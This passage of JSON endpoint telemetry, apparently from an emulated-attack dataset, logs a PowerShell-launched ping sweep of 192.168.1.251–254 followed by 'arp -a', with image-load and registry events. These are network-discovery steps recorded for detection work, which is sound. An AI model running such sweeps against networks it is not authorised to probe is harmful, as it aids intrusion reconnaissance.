"unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212610000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "process", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573216840000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.251", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2988, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": 
"{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "process", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573221830000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.252", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3648, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "process", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573226840000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.253", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5388, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "process", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573227290000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.254", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4220, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573227530000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4220, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227610000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227610000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227610000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "process", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573231990000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "process", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573231990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": 
"process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7784, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573232160000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", 
- "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "process", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "file", - "file_name": "CMD.EXE-89305D47.pf", - "file_path": "C:\\Windows\\Prefetch\\CMD.EXE-89305D47.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"arp -a\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2008, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573232800000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - 
"image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "command_line": "arp -a", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2080, - "ppid": 2008, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "subtype": "create", - "timestamp": 131883573232890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}", - "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
